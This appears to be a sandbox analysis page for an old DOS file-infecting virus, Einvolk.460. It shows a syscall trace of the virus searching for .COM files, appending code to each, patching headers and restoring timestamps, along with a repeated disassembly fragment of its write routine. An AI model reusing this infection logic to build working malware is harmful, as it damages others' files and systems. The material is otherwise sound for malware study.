Sample viewer

vx.netlux.org/Virus.DOS.Einvolk.460

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:13.027638372Z 71 PC: 12b31 | Get current directory
2018-12-17T22:58:13.031286414Z 47 PC: 12b36 | Get disk transfer address
2018-12-17T22:58:13.034047101Z 26 PC: 12b47 | Set disk transfer address
2018-12-17T22:58:13.035686196Z 78 PC: 12b55 | Find first file
2018-12-17T22:58:13.042686275Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.066421455Z 61 PC: 12bbc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:13.074200383Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.081907276Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.084220381Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.087204759Z 64 PC: 12bff | Write file or device (Write 527 bytes on handle 5)
2018-12-17T22:58:13.096183532Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.097882288Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.106211975Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.107644605Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.113227933Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.120405508Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.122522154Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.128995481Z 61 PC: 12bbc | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:13.146156253Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.151673432Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.15324915Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.156721997Z 64 PC: 12bff | Write file or device (Write 533 bytes on handle 5)
2018-12-17T22:58:13.170389366Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.171994654Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.177892099Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.187850959Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.197379179Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.208743749Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.213538993Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.22860978Z 61 PC: 12bbc | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:13.236046678Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.245299253Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.250779844Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.25363799Z 64 PC: 12bff | Write file or device (Write 538 bytes on handle 5)
2018-12-17T22:58:13.270988398Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.277624744Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.299741892Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.3031715Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.312255536Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.324246981Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.327666643Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.339304791Z 61 PC: 12bbc | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:13.347146075Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.354819885Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.35811368Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.36095244Z 64 PC: 12bff | Write file or device (Write 549 bytes on handle 5)
2018-12-17T22:58:13.370387677Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.373441371Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.382207474Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.384337008Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.394811037Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.406525829Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.409907647Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.421432035Z 61 PC: 12bbc | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:58:13.43028249Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.437903896Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.439907726Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.443676182Z 64 PC: 12bff | Write file or device (Write 555 bytes on handle 5)
2018-12-17T22:58:13.453411821Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.45541007Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.463979729Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.466174614Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.483511639Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.495743953Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.498840093Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.535325064Z 61 PC: 12bbc | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:58:13.545145765Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.553061506Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.55502371Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.557736489Z 64 PC: 12bff | Write file or device (Write 466 bytes on handle 5)
2018-12-17T22:58:13.568057793Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.570423997Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.57918906Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.582942156Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.592726916Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.604889565Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.608699045Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.627335224Z 61 PC: 12bbc | Open file (Filename = 'PAH.COM')
2018-12-17T22:58:13.636174676Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.645011742Z 66 PC: 12be4 | Move file pointer
2018-12-17T22:58:13.647128123Z 44 PC: 12bef | Get time 0x12bef: xor dh, dh
0x12bf1: mov cx, 0x1cc
0x12bf4: add cx, dx
0x12bf6: mov dx, 0x104
0x12bf9: add dx, si
0x12bfb: mov ah, 0x40
0x12bfd: int 0x21
0x12bff: call 0x22b8c
0x12c02: jb 0x12c1b
0x12c04: mov ax, 0x4200
0x12c07: xor dx, dx
0x12c09: xor cx, cx
0x12c0b: int 0x21
0x12c0d: jb 0x12c1b
0x12c0f: mov ah, 0x40
0x12c11: mov dx, 0x29e
0x12c14: add dx, si
0x12c16: mov cx, 4
0x12c19: int 0x21
0x12c1b: mov ax, 0x5701
2018-12-17T22:58:13.649975135Z 64 PC: 12bff | Write file or device (Write 477 bytes on handle 5)
2018-12-17T22:58:13.673806357Z 66 PC: 12c0d | Move file pointer
2018-12-17T22:58:13.675533818Z 64 PC: 12c1b | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:58:13.678513585Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.685298711Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.694263461Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.706134425Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.710562669Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.72375253Z 61 PC: 12bbc | Open file (Filename = 'TEST.COM')
2018-12-17T22:58:13.732732126Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.736077995Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.738951393Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.74758842Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.759840227Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.767484941Z 59 PC: 12b85 | Change current directory
2018-12-17T22:58:13.779912247Z 78 PC: 12b55 | Find first file
2018-12-17T22:58:13.786975045Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.801237305Z 61 PC: 12bbc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:58:13.809491484Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.813100044Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.816003484Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.824737573Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.836192091Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.840163035Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.851972189Z 61 PC: 12bbc | Open file (Filename = 'PRINT.COM')
2018-12-17T22:58:13.859632159Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.86367074Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.866557319Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.8745244Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.887222253Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.891482652Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.902723729Z 61 PC: 12bbc | Open file (Filename = 'HELLO.COM')
2018-12-17T22:58:13.911469104Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.915886067Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.918097558Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.926459738Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:13.938801837Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:13.942609586Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:13.954657651Z 61 PC: 12bbc | Open file (Filename = 'PHANG.COM')
2018-12-17T22:58:13.963459886Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:13.967624136Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:13.969841378Z 62 PC: 12c2c | Close file
2018-12-17T22:58:13.979199732Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:14.011495673Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:14.014739163Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:14.025638907Z 61 PC: 12bbc | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:58:14.033644394Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:14.036757747Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:14.03880094Z 62 PC: 12c2c | Close file
2018-12-17T22:58:14.047863991Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:14.058760142Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:14.06208127Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:14.076580647Z 61 PC: 12bbc | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:58:14.084420919Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:14.087792704Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:14.090992399Z 62 PC: 12c2c | Close file
2018-12-17T22:58:14.099173319Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:14.113701762Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:14.121979014Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:14.133612993Z 61 PC: 12bbc | Open file (Filename = 'PAH.COM')
2018-12-17T22:58:14.142059343Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:14.150939877Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:14.153155751Z 62 PC: 12c2c | Close file
2018-12-17T22:58:14.161640047Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:14.174504448Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:14.178371332Z 67 PC: 12bb5 | Get or set file attributes
2018-12-17T22:58:14.189756284Z 61 PC: 12bbc | Open file (Filename = 'TEST.COM')
2018-12-17T22:58:14.199034656Z 63 PC: 12bcb | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:58:14.207641763Z 87 PC: 12c28 | Get or set file date and time
2018-12-17T22:58:14.209905213Z 62 PC: 12c2c | Close file
2018-12-17T22:58:14.219508649Z 67 PC: 12c3c | Get or set file attributes
2018-12-17T22:58:14.231372535Z 79 PC: 12b55 | Find next file
2018-12-17T22:58:14.235484611Z 26 PC: 12b66 | Set disk transfer address
2018-12-17T22:58:14.237360938Z 59 PC: 12b70 | Change current directory
2018-12-17T22:58:14.240967919Z 9 PC: 12a47 | Display string (String= '(C) 1993 American Eagle Publications Inc., All Rights Reserved. Unauthorized use will be prosecuted under applicable copyright and software piracy laws. HOST #1 - You have just released a virus!')
2018-12-17T22:58:14.249808669Z 76 PC: 12a4c | Terminate with return code (Return code = '0')